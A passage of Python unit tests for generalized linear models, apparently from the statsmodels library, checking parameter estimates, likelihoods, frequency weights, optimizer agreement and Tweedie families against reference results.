y2 = np.array('0 1 0 0 0 1'.split(), int)
wt = np.array([50,1,50,1,5,10])
y2 = np.repeat(y2, wt)
x2 = np.repeat([0,0,0.001,100,-1,-1], wt)
mod = sm.GLM(y2, sm.add_constant(x2), family=sm.families.Binomial())
res = mod.fit(start_params=[-4, -5])
np.testing.assert_almost_equal(res.params, [-4.60305022, -5.29634545], 6)
def test_loglike_no_opt():
# see 1728
y = np.asarray([0, 1, 0, 0, 1, 1, 0, 1, 1, 1])
x = np.arange(10, dtype=np.float64)
def llf(params):
lin_pred = params[0] + params[1]*x
pr = 1 / (1 + np.exp(-lin_pred))
return np.sum(y*np.log(pr) + (1-y)*np.log(1-pr))
for params in [0,0], [0,1], [0.5,0.5]:
mod = sm.GLM(y, sm.add_constant(x), family=sm.families.Binomial())
res = mod.fit(start_params=params, maxiter=0)
like = llf(params)
assert_almost_equal(like, res.llf)
def test_formula_missing_exposure():
# see 2083
import statsmodels.formula.api as smf
d = {'Foo': [1, 2, 10, 149], 'Bar': [1, 2, 3, np.nan],
'constant': [1] * 4, 'exposure': np.random.uniform(size=4),
'x': [1, 3, 2, 1.5]}
df = pd.DataFrame(d)
family = sm.families.Gaussian(link=sm.families.links.log())
mod = smf.glm("Foo ~ Bar", data=df, exposure=df.exposure,
family=family)
assert_(type(mod.exposure) is np.ndarray, msg='Exposure is not ndarray')
exposure = pd.Series(np.random.uniform(size=5))
df.loc[3, 'Bar'] = 4 # nan not relevant for Valueerror for shape mismatch
assert_raises(ValueError, smf.glm, "Foo ~ Bar", data=df,
exposure=exposure, family=family)
assert_raises(ValueError, GLM, df.Foo, df[['constant', 'Bar']],
exposure=exposure, family=family)
@pytest.mark.matplotlib
def test_plots(close_figures):
np.random.seed(378)
n = 200
exog = np.random.normal(size=(n, 2))
lin_pred = exog[:, 0] + exog[:, 1]**2
prob = 1 / (1 + np.exp(-lin_pred))
endog = 1 * (np.random.uniform(size=n) < prob)
model = sm.GLM(endog, exog, family=sm.families.Binomial())
result = model.fit()
import pandas as pd
from statsmodels.graphics.regressionplots import add_lowess
# array interface
for j in 0,1:
fig = result.plot_added_variable(j)
add_lowess(fig.axes[0], frac=0.5)
close_or_save(pdf, fig)
fig = result.plot_partial_residuals(j)
add_lowess(fig.axes[0], frac=0.5)
close_or_save(pdf, fig)
fig = result.plot_ceres_residuals(j)
add_lowess(fig.axes[0], frac=0.5)
close_or_save(pdf, fig)
# formula interface
data = pd.DataFrame({"y": endog, "x1": exog[:, 0], "x2": exog[:, 1]})
model = sm.GLM.from_formula("y ~ x1 + x2", data, family=sm.families.Binomial())
result = model.fit()
for j in 0,1:
xname = ["x1", "x2"][j]
fig = result.plot_added_variable(xname)
add_lowess(fig.axes[0], frac=0.5)
close_or_save(pdf, fig)
fig = result.plot_partial_residuals(xname)
add_lowess(fig.axes[0], frac=0.5)
close_or_save(pdf, fig)
fig = result.plot_ceres_residuals(xname)
add_lowess(fig.axes[0], frac=0.5)
close_or_save(pdf, fig)
def gen_endog(lin_pred, family_class, link, binom_version=0):
np.random.seed(872)
fam = sm.families
mu = link().inverse(lin_pred)
if family_class == fam.Binomial:
if binom_version == 0:
endog = 1*(np.random.uniform(size=len(lin_pred)) < mu)
else:
endog = np.empty((len(lin_pred), 2))
n = 10
endog[:, 0] = (np.random.uniform(size=(len(lin_pred), n)) < mu[:, None]).sum(1)
endog[:, 1] = n - endog[:, 0]
elif family_class == fam.Poisson:
endog = np.random.poisson(mu)
elif family_class == fam.Gamma:
endog = np.random.gamma(2, mu)
elif family_class == fam.Gaussian:
endog = mu + 2 * np.random.normal(size=len(lin_pred))
elif family_class == fam.NegativeBinomial:
from scipy.stats.distributions import nbinom
endog = nbinom.rvs(mu, 0.5)
elif family_class == fam.InverseGaussian:
from scipy.stats.distributions import invgauss
endog = invgauss.rvs(mu, scale=20)
else:
raise ValueError
return endog
@pytest.mark.smoke
def test_summary():
np.random.seed(4323)
n = 100
exog = np.random.normal(size=(n, 2))
exog[:, 0] = 1
endog = np.random.normal(size=n)
for method in ["irls", "cg"]:
fa = sm.families.Gaussian()
model = sm.GLM(endog, exog, family=fa)
rslt = model.fit(method=method)
s = rslt.summary()
def check_score_hessian(results):
# compare models core and hessian with numerical derivatives
params = results.params
# avoid checking score at MLE, score close to zero
sc = results.model.score(params * 0.98, scale=1)
# cs currently (0.9) does not work for all families
llfunc = lambda x: results.model.loglike(x, scale=1)
sc2 = approx_fprime(params * 0.98, llfunc)
assert_allclose(sc, sc2, rtol=0.05)
hess = results.model.hessian(params, scale=1)
hess2 = approx_hess(params, llfunc)
assert_allclose(hess, hess2, rtol=0.05)
scfunc = lambda x: results.model.score(x, scale=1)
hess3 = approx_fprime(params, scfunc)
assert_allclose(hess, hess3, rtol=0.05)
def test_gradient_irls():
# Compare the results when using gradient optimization and IRLS.
# TODO: Find working examples for inverse_squared link
np.random.seed(87342)
fam = sm.families
lnk = sm.families.links
families = [(fam.Binomial, [lnk.logit, lnk.probit, lnk.cloglog, lnk.log, lnk.cauchy]),
(fam.Poisson, [lnk.log, lnk.identity, lnk.sqrt]),
(fam.Gamma, [lnk.log, lnk.identity, lnk.inverse_power]),
(fam.Gaussian, [lnk.identity, lnk.log, lnk.inverse_power]),
(fam.InverseGaussian, [lnk.log, lnk.identity, lnk.inverse_power, lnk.inverse_squared]),
(fam.NegativeBinomial, [lnk.log, lnk.inverse_power, lnk.inverse_squared, lnk.identity])]
n = 100
p = 3
exog = np.random.normal(size=(n, p))
exog[:, 0] = 1
skip_one = False
for family_class, family_links in families:
for link in family_links:
for binom_version in 0,1:
if family_class != fam.Binomial and binom_version == 1:
continue
if (family_class, link) == (fam.Poisson, lnk.identity):
lin_pred = 20 + exog.sum(1)
elif (family_class, link) == (fam.Binomial, lnk.log):
lin_pred = -1 + exog.sum(1) / 8
elif (family_class, link) == (fam.Poisson, lnk.sqrt):
lin_pred = 2 + exog.sum(1)
elif (family_class, link) == (fam.InverseGaussian, lnk.log):
#skip_zero = True
lin_pred = -1 + exog.sum(1)
elif (family_class, link) == (fam.InverseGaussian, lnk.identity):
lin_pred = 20 + 5*exog.sum(1)
lin_pred = np.clip(lin_pred, 1e-4, np.inf)
elif (family_class, link) == (fam.InverseGaussian, lnk.inverse_squared):
lin_pred = 0.5 + exog.sum(1) / 5
continue # skip due to non-convergence
elif (family_class, link) == (fam.InverseGaussian, lnk.inverse_power):
lin_pred = 1 + exog.sum(1) / 5
elif (family_class, link) == (fam.NegativeBinomial, lnk.identity):
lin_pred = 20 + 5*exog.sum(1)
lin_pred = np.clip(lin_pred, 1e-4, np.inf)
elif (family_class, link) == (fam.NegativeBinomial, lnk.inverse_squared):
lin_pred = 0.1 + np.random.uniform(size=exog.shape[0])
continue # skip due to non-convergence
elif (family_class, link) == (fam.NegativeBinomial, lnk.inverse_power):
lin_pred = 1 + exog.sum(1) / 5
elif (family_class, link) == (fam.Gaussian, lnk.inverse_power):
# adding skip because of convergence failure
skip_one = True
# the following fails with identity link, because endog < 0
# elif family_class == fam.Gamma:
# lin_pred = 0.5 * exog.sum(1) + np.random.uniform(size=exog.shape[0])
else:
lin_pred = np.random.uniform(size=exog.shape[0])
endog = gen_endog(lin_pred, family_class, link, binom_version)
with warnings.catch_warnings():
warnings.simplefilter("ignore")
mod_irls = sm.GLM(endog, exog, family=family_class(link=link()))
rslt_irls = mod_irls.fit(method="IRLS")
if not (family_class, link) in [(fam.Poisson, lnk.sqrt),
(fam.Gamma, lnk.inverse_power),
(fam.InverseGaussian, lnk.identity)
]:
check_score_hessian(rslt_irls)
# Try with and without starting values.
for max_start_irls, start_params in (0, rslt_irls.params), (3, None):
# TODO: skip convergence failures for now
if max_start_irls > 0 and skip_one:
continue
with warnings.catch_warnings():
warnings.simplefilter("ignore")
mod_gradient = sm.GLM(endog, exog, family=family_class(link=link()))
rslt_gradient = mod_gradient.fit(max_start_irls=max_start_irls,
start_params=start_params,
method="newton", maxiter=300)
assert_allclose(rslt_gradient.params,
rslt_irls.params, rtol=1e-6, atol=5e-5)
assert_allclose(rslt_gradient.llf, rslt_irls.llf,
rtol=1e-6, atol=1e-6)
assert_allclose(rslt_gradient.scale, rslt_irls.scale,
rtol=1e-6, atol=1e-6)
# Get the standard errors using expected information.
gradient_bse = rslt_gradient.bse
ehess = mod_gradient.hessian(rslt_gradient.params, observed=False)
gradient_bse = np.sqrt(-np.diag(np.linalg.inv(ehess)))
assert_allclose(gradient_bse, rslt_irls.bse, rtol=1e-6, atol=5e-5)
# rslt_irls.bse corresponds to observed=True
assert_allclose(rslt_gradient.bse, rslt_irls.bse, rtol=0.2, atol=5e-5)
rslt_gradient_eim = mod_gradient.fit(max_start_irls=0,
cov_type='eim',
start_params=rslt_gradient.params,
method="newton", maxiter=300)
assert_allclose(rslt_gradient_eim.bse, rslt_irls.bse, rtol=5e-5, atol=0)
def test_gradient_irls_eim():
# Compare the results when using eime gradient optimization and IRLS.
# TODO: Find working examples for inverse_squared link
np.random.seed(87342)
fam = sm.families
lnk = sm.families.links
families = [(fam.Binomial, [lnk.logit, lnk.probit, lnk.cloglog, lnk.log,
lnk.cauchy]),
(fam.Poisson, [lnk.log, lnk.identity, lnk.sqrt]),
(fam.Gamma, [lnk.log, lnk.identity, lnk.inverse_power]),
(fam.Gaussian, [lnk.identity, lnk.log, lnk.inverse_power]),
(fam.InverseGaussian, [lnk.log, lnk.identity,
lnk.inverse_power,
lnk.inverse_squared]),
(fam.NegativeBinomial, [lnk.log, lnk.inverse_power,
lnk.inverse_squared, lnk.identity])]
n = 100
p = 3
exog = np.random.normal(size=(n, p))
exog[:, 0] = 1
skip_one = False
for family_class, family_links in families:
for link in family_links:
for binom_version in 0, 1:
if family_class != fam.Binomial and binom_version == 1:
continue
if (family_class, link) == (fam.Poisson, lnk.identity):
lin_pred = 20 + exog.sum(1)
elif (family_class, link) == (fam.Binomial, lnk.log):
lin_pred = -1 + exog.sum(1) / 8
elif (family_class, link) == (fam.Poisson, lnk.sqrt):
lin_pred = 2 + exog.sum(1)
elif (family_class, link) == (fam.InverseGaussian, lnk.log):
# skip_zero = True
lin_pred = -1 + exog.sum(1)
elif (family_class, link) == (fam.InverseGaussian,
lnk.identity):
lin_pred = 20 + 5*exog.sum(1)
lin_pred = np.clip(lin_pred, 1e-4, np.inf)
elif (family_class, link) == (fam.InverseGaussian,
lnk.inverse_squared):
lin_pred = 0.5 + exog.sum(1) / 5
continue # skip due to non-convergence
elif (family_class, link) == (fam.InverseGaussian,
lnk.inverse_power):
lin_pred = 1 + exog.sum(1) / 5
elif (family_class, link) == (fam.NegativeBinomial,
lnk.identity):
lin_pred = 20 + 5*exog.sum(1)
lin_pred = np.clip(lin_pred, 1e-4, np.inf)
elif (family_class, link) == (fam.NegativeBinomial,
lnk.inverse_squared):
lin_pred = 0.1 + np.random.uniform(size=exog.shape[0])
continue # skip due to non-convergence
elif (family_class, link) == (fam.NegativeBinomial,
lnk.inverse_power):
lin_pred = 1 + exog.sum(1) / 5
elif (family_class, link) == (fam.Gaussian, lnk.inverse_power):
# adding skip because of convergence failure
skip_one = True
else:
lin_pred = np.random.uniform(size=exog.shape[0])
endog = gen_endog(lin_pred, family_class, link, binom_version)
with warnings.catch_warnings():
warnings.simplefilter("ignore")
mod_irls = sm.GLM(endog, exog,
family=family_class(link=link()))
rslt_irls = mod_irls.fit(method="IRLS")
# Try with and without starting values.
for max_start_irls, start_params in ((0, rslt_irls.params),
(3, None)):
# TODO: skip convergence failures for now
if max_start_irls > 0 and skip_one:
continue
with warnings.catch_warnings():
warnings.simplefilter("ignore")
mod_gradient = sm.GLM(endog, exog,
family=family_class(link=link()))
rslt_gradient = mod_gradient.fit(
max_start_irls=max_start_irls,
start_params=start_params,
method="newton",
optim_hessian='eim'
)
assert_allclose(rslt_gradient.params, rslt_irls.params,
rtol=1e-6, atol=5e-5)
assert_allclose(rslt_gradient.llf, rslt_irls.llf,
rtol=1e-6, atol=1e-6)
assert_allclose(rslt_gradient.scale, rslt_irls.scale,
rtol=1e-6, atol=1e-6)
# Get the standard errors using expected information.
ehess = mod_gradient.hessian(rslt_gradient.params,
observed=False)
gradient_bse = np.sqrt(-np.diag(np.linalg.inv(ehess)))
assert_allclose(gradient_bse, rslt_irls.bse, rtol=1e-6,
atol=5e-5)
def test_glm_irls_method():
nobs, k_vars = 50, 4
np.random.seed(987126)
x = np.random.randn(nobs, k_vars - 1)
exog = add_constant(x, has_constant='add')
y = exog.sum(1) + np.random.randn(nobs)
mod = GLM(y, exog)
res1 = mod.fit()
res2 = mod.fit(wls_method='pinv', attach_wls=True)
res3 = mod.fit(wls_method='qr', attach_wls=True)
# fit_gradient does not attach mle_settings
res_g1 = mod.fit(start_params=res1.params, method='bfgs')
for r in [res1, res2, res3]:
assert_equal(r.mle_settings['optimizer'], 'IRLS')
assert_equal(r.method, 'IRLS')
assert_equal(res1.mle_settings['wls_method'], 'lstsq')
assert_equal(res2.mle_settings['wls_method'], 'pinv')
assert_equal(res3.mle_settings['wls_method'], 'qr')
assert_(hasattr(res2.results_wls.model, 'pinv_wexog'))
assert_(hasattr(res3.results_wls.model, 'exog_Q'))
# fit_gradient currently does not attach mle_settings
assert_equal(res_g1.method, 'bfgs')
class CheckWtdDuplicationMixin(object):
decimal_params = DECIMAL_4
@classmethod
def setup_class(cls):
cls.data = cpunish.load(as_pandas=False)
cls.endog = cls.data.endog
cls.exog = cls.data.exog
np.random.seed(1234)
cls.weight = np.random.randint(5, 100, len(cls.endog))
cls.endog_big = np.repeat(cls.endog, cls.weight)
cls.exog_big = np.repeat(cls.exog, cls.weight, axis=0)
def test_params(self):
assert_allclose(self.res1.params, self.res2.params, atol=1e-6,
rtol=1e-6)
decimal_bse = DECIMAL_4
def test_standard_errors(self):
assert_allclose(self.res1.bse, self.res2.bse, rtol=1e-5, atol=1e-6)
decimal_resids = DECIMAL_4
# TODO: This does not work... Arrays are of different shape.
# Perhaps we use self.res1.model.family.resid_XXX()?
"""
def test_residuals(self):
resids1 = np.column_stack((self.res1.resid_pearson,
self.res1.resid_deviance,
self.res1.resid_working,
self.res1.resid_anscombe,
self.res1.resid_response))
resids2 = np.column_stack((self.res1.resid_pearson,
self.res2.resid_deviance,
self.res2.resid_working,
self.res2.resid_anscombe,
self.res2.resid_response))
assert_allclose(resids1, resids2, self.decimal_resids)
"""
def test_aic(self):
# R includes the estimation of the scale as a lost dof
# Does not with Gamma though
assert_allclose(self.res1.aic, self.res2.aic, atol=1e-6, rtol=1e-6)
def test_deviance(self):
assert_allclose(self.res1.deviance, self.res2.deviance, atol=1e-6,
rtol=1e-6)
def test_scale(self):
assert_allclose(self.res1.scale, self.res2.scale, atol=1e-6, rtol=1e-6)
def test_loglike(self):
# Stata uses the below llf for these families
# We differ with R for them
assert_allclose(self.res1.llf, self.res2.llf, 1e-6)
decimal_null_deviance = DECIMAL_4
def test_null_deviance(self):
assert_allclose(self.res1.null_deviance, self.res2.null_deviance,
atol=1e-6, rtol=1e-6)
decimal_bic = DECIMAL_4
def test_bic(self):
assert_allclose(self.res1.bic, self.res2.bic, atol=1e-6, rtol=1e-6)
decimal_fittedvalues = DECIMAL_4
def test_fittedvalues(self):
res2_fitted = self.res2.predict(self.res1.model.exog)
assert_allclose(self.res1.fittedvalues, res2_fitted, atol=1e-5,
rtol=1e-5)
decimal_tpvalues = DECIMAL_4
def test_tpvalues(self):
# test comparing tvalues and pvalues with normal implementation
# make sure they use normal distribution (inherited in results class)
assert_allclose(self.res1.tvalues, self.res2.tvalues, atol=1e-6,
rtol=2e-4)
assert_allclose(self.res1.pvalues, self.res2.pvalues, atol=1e-6,
rtol=1e-6)
assert_allclose(self.res1.conf_int(), self.res2.conf_int(), atol=1e-6,
rtol=1e-6)
class TestWtdGlmPoisson(CheckWtdDuplicationMixin):
@classmethod
def setup_class(cls):
'''
Tests Poisson family with canonical log link.
'''
super(TestWtdGlmPoisson, cls).setup_class()
cls.res1 = GLM(cls.endog, cls.exog,
freq_weights=cls.weight,
family=sm.families.Poisson()).fit()
cls.res2 = GLM(cls.endog_big, cls.exog_big,
family=sm.families.Poisson()).fit()
class TestWtdGlmPoissonNewton(CheckWtdDuplicationMixin):
@classmethod
def setup_class(cls):
'''
Tests Poisson family with canonical log link.
'''
super(TestWtdGlmPoissonNewton, cls).setup_class()
start_params = np.array([1.82794424e-04, -4.76785037e-02,
-9.48249717e-02, -2.92293226e-04,
2.63728909e+00, -2.05934384e+01])
fit_kwds = dict(method='newton')
cls.res1 = GLM(cls.endog, cls.exog,
freq_weights=cls.weight,
family=sm.families.Poisson()).fit(**fit_kwds)
fit_kwds = dict(method='newton', start_params=start_params)
cls.res2 = GLM(cls.endog_big, cls.exog_big,
family=sm.families.Poisson()).fit(**fit_kwds)
class TestWtdGlmPoissonHC0(CheckWtdDuplicationMixin):
@classmethod
def setup_class(cls):
'''
Tests Poisson family with canonical log link.
'''
super(TestWtdGlmPoissonHC0, cls).setup_class()
start_params = np.array([1.82794424e-04, -4.76785037e-02,
-9.48249717e-02, -2.92293226e-04,
2.63728909e+00, -2.05934384e+01])
fit_kwds = dict(cov_type='HC0')
cls.res1 = GLM(cls.endog, cls.exog,
freq_weights=cls.weight,
family=sm.families.Poisson()).fit(**fit_kwds)
fit_kwds = dict(cov_type='HC0', start_params=start_params)
cls.res2 = GLM(cls.endog_big, cls.exog_big,
family=sm.families.Poisson()).fit(**fit_kwds)
class TestWtdGlmPoissonClu(CheckWtdDuplicationMixin):
@classmethod
def setup_class(cls):
'''
Tests Poisson family with canonical log link.
'''
super(TestWtdGlmPoissonClu, cls).setup_class()
start_params = np.array([1.82794424e-04, -4.76785037e-02,
-9.48249717e-02, -2.92293226e-04,
2.63728909e+00, -2.05934384e+01])
gid = np.arange(1, len(cls.endog) + 1) // 2
fit_kwds = dict(cov_type='cluster', cov_kwds={'groups': gid, 'use_correction':False})
import warnings
with warnings.catch_warnings():
warnings.simplefilter("ignore")
cls.res1 = GLM(cls.endog, cls.exog,
freq_weights=cls.weight,
family=sm.families.Poisson()).fit(**fit_kwds)
gidr = np.repeat(gid, cls.weight)
fit_kwds = dict(cov_type='cluster', cov_kwds={'groups': gidr, 'use_correction':False})
cls.res2 = GLM(cls.endog_big, cls.exog_big,
family=sm.families.Poisson()).fit(start_params=start_params,
**fit_kwds)
class TestWtdGlmBinomial(CheckWtdDuplicationMixin):
@classmethod
def setup_class(cls):
'''
Tests Binomial family with canonical logit link.
'''
super(TestWtdGlmBinomial, cls).setup_class()
cls.endog = cls.endog / 100
cls.endog_big = cls.endog_big / 100
cls.res1 = GLM(cls.endog, cls.exog,
freq_weights=cls.weight,
family=sm.families.Binomial()).fit()
cls.res2 = GLM(cls.endog_big, cls.exog_big,
family=sm.families.Binomial()).fit()
class TestWtdGlmNegativeBinomial(CheckWtdDuplicationMixin):
@classmethod
def setup_class(cls):
'''
Tests Negative Binomial family with canonical link
g(p) = log(p/(p + 1/alpha))
'''
super(TestWtdGlmNegativeBinomial, cls).setup_class()
alpha = 1.
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=DomainWarning)
family_link = sm.families.NegativeBinomial(
link=sm.families.links.nbinom(alpha=alpha),
alpha=alpha)
cls.res1 = GLM(cls.endog, cls.exog,
freq_weights=cls.weight,
family=family_link).fit()
cls.res2 = GLM(cls.endog_big, cls.exog_big,
family=family_link).fit()
class TestWtdGlmGamma(CheckWtdDuplicationMixin):
@classmethod
def setup_class(cls):
'''
Tests Gamma family with log link.
'''
super(TestWtdGlmGamma, cls).setup_class()
family_link = sm.families.Gamma(sm.families.links.log())
cls.res1 = GLM(cls.endog, cls.exog,
freq_weights=cls.weight,
family=family_link).fit()
cls.res2 = GLM(cls.endog_big, cls.exog_big,
family=family_link).fit()
class TestWtdGlmGaussian(CheckWtdDuplicationMixin):
@classmethod
def setup_class(cls):
'''
Tests Gaussian family with log link.
'''
super(TestWtdGlmGaussian, cls).setup_class()
family_link = sm.families.Gaussian(sm.families.links.log())
cls.res1 = GLM(cls.endog, cls.exog,
freq_weights=cls.weight,
family=family_link).fit()
cls.res2 = GLM(cls.endog_big, cls.exog_big,
family=family_link).fit()
class TestWtdGlmInverseGaussian(CheckWtdDuplicationMixin):
@classmethod
def setup_class(cls):
'''
Tests InverseGaussian family with log link.
'''
super(TestWtdGlmInverseGaussian, cls).setup_class()
family_link = sm.families.InverseGaussian(sm.families.links.log())
cls.res1 = GLM(cls.endog, cls.exog,
freq_weights=cls.weight,
family=family_link).fit()
cls.res2 = GLM(cls.endog_big, cls.exog_big,
family=family_link).fit()
class TestWtdGlmGammaNewton(CheckWtdDuplicationMixin):
@classmethod
def setup_class(cls):
'''
Tests Gamma family with log link.
'''
super(TestWtdGlmGammaNewton, cls).setup_class()
family_link = sm.families.Gamma(sm.families.links.log())
cls.res1 = GLM(cls.endog, cls.exog,
freq_weights=cls.weight,
family=family_link,
method='newton').fit()
cls.res2 = GLM(cls.endog_big, cls.exog_big,
family=family_link,
method='newton').fit()
class TestWtdGlmGammaScale_X2(CheckWtdDuplicationMixin):
@classmethod
def setup_class(cls):
'''
Tests Gamma family with log link.
'''
super(TestWtdGlmGammaScale_X2, cls).setup_class()
family_link = sm.families.Gamma(sm.families.links.log())
cls.res1 = GLM(cls.endog, cls.exog,
freq_weights=cls.weight,
family=family_link,
scale='X2').fit()
cls.res2 = GLM(cls.endog_big, cls.exog_big,
family=family_link,
scale='X2').fit()
class TestWtdGlmGammaScale_dev(CheckWtdDuplicationMixin):
@classmethod
def setup_class(cls):
'''
Tests Gamma family with log link.
'''
super(TestWtdGlmGammaScale_dev, cls).setup_class()
family_link = sm.families.Gamma(sm.families.links.log())
cls.res1 = GLM(cls.endog, cls.exog,
freq_weights=cls.weight,
family=family_link,
scale='dev').fit()
cls.res2 = GLM(cls.endog_big, cls.exog_big,
family=family_link,
scale='dev').fit()
def test_missing(self):
endog = self.data.endog.copy()
exog = self.data.exog.copy()
exog[0, 0] = np.nan
endog[[2, 4, 6, 8]] = np.nan
freq_weights = self.weight
mod_misisng = GLM(endog, exog, family=self.res1.model.family,
freq_weights=freq_weights, missing='drop')
assert_equal(mod_misisng.freq_weights.shape[0],
mod_misisng.endog.shape[0])
assert_equal(mod_misisng.freq_weights.shape[0],
mod_misisng.exog.shape[0])
keep_idx = np.array([1, 3, 5, 7, 9, 10, 11, 12, 13, 14, 15, 16])
assert_equal(mod_misisng.freq_weights, self.weight[keep_idx])
class TestWtdTweedieLog(CheckWtdDuplicationMixin):
@classmethod
def setup_class(cls):
'''
Tests Tweedie family with log link and var_power=1.
'''
super(TestWtdTweedieLog, cls).setup_class()
family_link = sm.families.Tweedie(link=sm.families.links.log(),
var_power=1)
cls.res1 = GLM(cls.endog, cls.exog,
freq_weights=cls.weight,
family=family_link).fit()
cls.res2 = GLM(cls.endog_big, cls.exog_big,
family=family_link).fit()
class TestWtdTweediePower2(CheckWtdDuplicationMixin):
@classmethod
def setup_class(cls):
'''
Tests Tweedie family with Power(1) link and var_power=2.
'''
cls.data = cpunish.load_pandas()
cls.endog = cls.data.endog
cls.exog = cls.data.exog[['INCOME', 'SOUTH']]
np.random.seed(1234)
cls.weight = np.random.randint(5, 100, len(cls.endog))
cls.endog_big = np.repeat(cls.endog.values, cls.weight)
cls.exog_big = np.repeat(cls.exog.values, cls.weight, axis=0)
link = sm.families.links.Power()
family_link = sm.families.Tweedie(link=link, var_power=2)
cls.res1 = GLM(cls.endog, cls.exog,
freq_weights=cls.weight,
family=family_link).fit()
cls.res2 = GLM(cls.endog_big, cls.exog_big,
family=family_link).fit()
class TestWtdTweediePower15(CheckWtdDuplicationMixin):
@classmethod
def setup_class(cls):
'''
Tests Tweedie family with Power(0.5) link and var_power=1.5.
'''
super(TestWtdTweediePower15, cls).setup_class()
family_link = sm.families.Tweedie(link=sm.families.links.Power(0.5),
var_power=1.5)
cls.res1 = GLM(cls.endog, cls.exog,
freq_weights=cls.weight,
family=family_link).fit()
cls.res2 = GLM(cls.endog_big, cls.exog_big,
family=family_link).fit()
def test_wtd_patsy_missing():
import pandas as pd
data = cpunish.load(as_pandas=False)
data.exog[0, 0] = np.nan
data.endog[[2, 4, 6, 8]] = np.nan
data.pandas = pd.DataFrame(data.exog, columns=data.exog_name)
data.pandas['EXECUTIONS'] = data.endog
weights = np.arange(1, len(data.endog)+1)
formula = """EXECUTIONS ~ INCOME + PERPOVERTY + PERBLACK + VC100k96 +
SOUTH + DEGREE"""
mod_misisng = GLM.from_formula(formula, data=data.pandas,
freq_weights=weights)
assert_equal(mod_misisng.freq_weights.shape[0],
mod_misisng.endog.shape[0])
assert_equal(mod_misisng.freq_weights.shape[0],
mod_misisng.exog.shape[0])
assert_equal(mod_misisng.freq_weights.shape[0], 12)
keep_weights = np.array([2, 4, 6, 8, 10, 11, 12, 13, 14, 15, 16, 17])
assert_equal(mod_misisng.freq_weights, keep_weights)
class CheckTweedie(object):
def test_resid(self):
idx1 = len(self.res1.resid_response) - 1
idx2 = len(self.res2.resid_response) - 1
assert_allclose(np.concatenate((self.res1.resid_response[:17],
[self.res1.resid_response[idx1]])),
np.concatenate((self.res2.resid_response[:17],
[self.res2.resid_response[idx2]])),
rtol=1e-5, atol=1e-5)
assert_allclose(np.concatenate((self.res1.resid_pearson[:17],
[self.res1.resid_pearson[idx1]])),
np.concatenate((self.res2.resid_pearson[:17],
[self.res2.resid_pearson[idx2]])),
rtol=1e-5, atol=1e-5)
assert_allclose(np.concatenate((self.res1.resid_deviance[:17],
[self.res1.resid_deviance[idx1]])),
np.concatenate((self.res2.resid_deviance[:17],
[self.res2.resid_deviance[idx2]])),
rtol=1e-5, atol=1e-5)
assert_allclose(np.concatenate((self.res1.resid_working[:17],
[self.res1.resid_working[idx1]])),
np.concatenate((self.res2.resid_working[:17],
[self.res2.resid_working[idx2]])),
rtol=1e-5, atol=1e-5)
def test_bse(self):
assert_allclose(self.res1.bse, self.res2.bse, atol=1e-6, rtol=1e6)
def test_params(self):
assert_allclose(self.res1.params, self.res2.params, atol=1e-5,
rtol=1e-5)
def test_deviance(self):
assert_allclose(self.res1.deviance, self.res2.deviance, atol=1e-6,
rtol=1e-6)
def test_df(self):
assert_equal(self.res1.df_model, self.res2.df_model)
assert_equal(self.res1.df_resid, self.res2.df_resid)
def test_fittedvalues(self):
idx1 = len(self.res1.fittedvalues) - 1
idx2 = len(self.res2.resid_response) - 1
assert_allclose(np.concatenate((self.res1.fittedvalues[:17],
[self.res1.fittedvalues[idx1]])),
np.concatenate((self.res2.fittedvalues[:17],
[self.res2.fittedvalues[idx2]])),
atol=1e-4, rtol=1e-4)
def test_summary(self):
self.res1.summary()
self.res1.summary2()
class TestTweediePower15(CheckTweedie):
@classmethod
def setup_class(cls):
from .results.results_glm import CpunishTweediePower15
cls.data = cpunish.load_pandas()
cls.exog = cls.data.exog[['INCOME', 'SOUTH']]
cls.endog = cls.data.endog
family_link = sm.families.Tweedie(link=sm.families.links.Power(1),
var_power=1.5)
cls.res1 = sm.GLM(endog=cls.data.endog,
exog=cls.data.exog[['INCOME', 'SOUTH']],
family=family_link).fit()
cls.res2 = CpunishTweediePower15()
class TestTweediePower2(CheckTweedie):
@classmethod
def setup_class(cls):
from .results.results_glm import CpunishTweediePower2
cls.data = cpunish.load_pandas()
cls.exog = cls.data.exog[['INCOME', 'SOUTH']]
cls.endog = cls.data.endog
family_link = sm.families.Tweedie(link=sm.families.links.Power(1),
var_power=2.)
cls.res1 = sm.GLM(endog=cls.data.endog,
exog=cls.data.exog[['INCOME', 'SOUTH']],
family=family_link).fit()
cls.res2 = CpunishTweediePower2()
class TestTweedieLog1(CheckTweedie):
@classmethod
def setup_class(cls):
from .results.results_glm import CpunishTweedieLog1
cls.data = cpunish.load_pandas()
cls.exog = cls.data.exog[['INCOME', 'SOUTH']]
cls.endog = cls.data.endog
family_link = sm.families.Tweedie(link=sm.families.links.log(),
var_power=1.)
cls.res1 = sm.GLM(endog=cls.data.endog,
exog=cls.data.exog[['INCOME', 'SOUTH']],
family=family_link).fit()
cls.res2 = CpunishTweedieLog1()
class TestTweedieLog15Fair(CheckTweedie):
@classmethod
def setup_class(cls):
from .results.results_glm import FairTweedieLog15
from statsmodels.datasets.fair import load_pandas
data = load_pandas()
family_link = sm.families.Tweedie(link=sm.families.links.log(),
var_power=1.5)
cls.res1 = sm.GLM(endog=data.endog,
exog=data.exog[['rate_marriage', 'age',
'yrs_married']],
family=family_link).fit()
cls.res2 = FairTweedieLog15()
class CheckTweedieSpecial(object):
def test_mu(self):
assert_allclose(self.res1.mu, self.res2.mu, rtol=1e-5, atol=1e-5)
def test_resid(self):
assert_allclose(self.res1.resid_response, self.res2.resid_response,
rtol=1e-5, atol=1e-5)
assert_allclose(self.res1.resid_pearson, self.res2.resid_pearson,
rtol=1e-5, atol=1e-5)
assert_allclose(self.res1.resid_deviance, self.res2.resid_deviance,
rtol=1e-5, atol=1e-5)
assert_allclose(self.res1.resid_working, self.res2.resid_working,
rtol=1e-5, atol=1e-5)
assert_allclose(self.res1.resid_anscombe_unscaled,
self.res2.resid_anscombe_unscaled,
rtol=1e-5, atol=1e-5)
class TestTweedieSpecialLog0(CheckTweedieSpecial):
@classmethod
def setup_class(cls):
cls.data = cpunish.load_pandas()
cls.exog = cls.data.exog[['INCOME', 'SOUTH']]
cls.endog = cls.data.endog
family1 = sm.families.Gaussian(link=sm.families.links.log())
cls.res1 = sm.GLM(endog=cls.data.endog,
exog=cls.data.exog[['INCOME', 'SOUTH']],
family=family1).fit()
family2 = sm.families.Tweedie(link=sm.families.links.log(),
var_power=0)
cls.res2 = sm.GLM(endog=cls.data.endog,
exog=cls.data.exog[['INCOME', 'SOUTH']],
family=family2).fit()
